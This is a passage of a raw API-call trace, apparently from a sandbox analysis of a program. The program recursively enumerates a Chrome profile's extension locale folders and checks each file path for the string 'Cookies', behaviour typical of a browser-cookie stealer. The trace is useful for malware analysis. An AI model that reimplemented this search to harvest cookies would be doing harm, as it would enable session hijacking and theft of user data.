Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" [0163.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned 138 [0163.227] lstrlenW (lpString="messages.json") returned 13 [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x9175e8 [0163.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" [0163.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" [0163.227] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.227] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpSrch="Cookies") returned 0x0 [0163.227] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.227] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.227] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.227] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.227] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.227] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ca", cAlternateFileName="")) returned 1 [0163.227] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0163.227] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0163.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.227] lstrlenW (lpString="\\") returned 1 [0163.227] GetProcessHeap () returned 0x8e0000 [0163.227] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.228] lstrlenW (lpString="ca") returned 2 [0163.228] GetProcessHeap () returned 0x8e0000 [0163.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0163.228] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.228] GetProcessHeap () returned 0x8e0000 [0163.228] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0163.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0163.228] lstrlenW (lpString="\\*.*") returned 4 [0163.228] GetProcessHeap () returned 0x8e0000 [0163.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0163.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*" [0163.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.228] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.228] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.228] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.228] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.228] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0163.229] lstrlenW (lpString="\\") returned 1 [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0163.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" [0163.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned 138 [0163.229] lstrlenW (lpString="messages.json") returned 13 [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x9175e8 [0163.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\" [0163.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" [0163.229] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.229] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpSrch="Cookies") returned 0x0 [0163.229] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.229] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.229] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.229] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.229] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.229] GetProcessHeap () returned 0x8e0000 [0163.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.229] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="cs", cAlternateFileName="")) returned 1 [0163.229] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0163.229] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0163.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.230] lstrlenW (lpString="\\") returned 1 [0163.230] GetProcessHeap () returned 0x8e0000 [0163.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.230] lstrlenW (lpString="cs") returned 2 [0163.230] GetProcessHeap () returned 0x8e0000 [0163.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0163.230] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.230] GetProcessHeap () returned 0x8e0000 [0163.230] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0163.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0163.230] lstrlenW (lpString="\\*.*") returned 4 [0163.230] GetProcessHeap () returned 0x8e0000 [0163.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0163.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*" [0163.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.230] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.230] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: 